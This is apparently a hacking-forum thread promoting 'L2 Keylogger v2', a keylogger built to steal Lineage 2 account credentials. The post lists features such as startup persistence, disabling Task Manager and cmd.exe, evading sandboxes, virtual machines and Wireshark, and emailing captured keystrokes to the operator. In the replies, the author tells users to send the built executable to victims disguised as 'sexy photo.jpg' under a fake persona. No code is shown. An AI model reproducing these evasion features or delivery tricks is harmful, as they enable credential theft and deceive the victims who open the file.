[Preview]L2 Keylogger v2 (Hot!)

Stealth

Description

Well I think most of you know what a keylogger is.If you don't then read this article in wikipedia.

This keylogger is specially designed to steal lineage 2 accounts.

I am currently working on an algorithm to improve the efficiency of account stealing

and server detection (which means when you steal an account it detects in what server it is used).

L2Thief™ is the module i am working on for the improvements.It will run seperatelly and collect data that can be used to trace down

the server where the user is playing and which has the highest probability the account will be used on.

This is early beta for now but I hope I will finish it real soon.

Screenshots

2zyk8q8.png

25g8j2q.png

2db1302.png

Download full screenshots pack (8 files 1,05 MB)

License agreement

THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY  APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT  HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM “AS IS” WITHOUT   WARRANTY  OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,  THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR  PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE   PROGRAM  IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF  ALL NECESSARY SERVICING, REPAIR OR CORRECTION.

Changes

New Features:

- Add to startup.

- Restart computer

- Disable cmd.exe

- Disable taskmgr.exe

- Anti wireshark

- Anti sandboxie

- Anti VMWare

- Close upon detection of VMWare or Sandboxie or Wireshark

- Restart upon detection of VMWare or Sandboxie or Wireshark

- L2Thief technology (intelligent l2 account stealer)

- Notifications changes

- Launch a website

Changes:

- No changes , all features are rewritten from scratch.

Bugfix:

- No known bugs so far

Download Beta Test Version (URL Bug Fixed)!

The stub source is taken from another forum , so be careful

Thanks to: MasterDisaster and *Vazelos*

Oh I almost forgot , this is only for testing and educational purposes (now its legal) ;)

[GR]ti kanei akrivos afto to program tou vazeis entoles kai xirizete afto to pc?? dn exw katalavi..

Ftiaxnei ena arxeio to opoio to stelneis sto "thima" kai tou klevei tous kwdikous sto l2 kai stous stelnei me email.

dld ti kleveis acc apo l2??

[gr]Username kai password.[/gr]

Nice job :)

keep it up i will test it with the 1st release :)

Thanks.

Beta test version added!

Please test it on a virtual machine if you have one and tell me,

Thanks.

i already download it... the email works fine... but how i use it?

i already download it... the email works fine... but how i use it?

You choose the options you want , and build an executable file named server.exe.

You send that file to your victim.

Edit: Tell him you are a sexy russian girl and rename that executable to sexy photo.jpg (do not change the extension just the name) zip it and send it.I have tested it , it works spreading that way :P LOL

You choose the options you want , and build an executable file named server.exe.

You send that file to your victim.

i can rename it? and if  he execute it?

i can rename it? and if  he execute it?

Yes you can rename it , if he executes it it depends on the options what happens , but it actually does not do any harm , just steals passwords.It logs all keystrokes and emails them to you at the time interval you specify.

Yes you can rename it , if he executes it it depends on the options what happens , but it actually does not do any harm , just steals passwords.It logs all keystrokes and emails them to you at the time interval you specify.

EDIT: he said something about .NET.....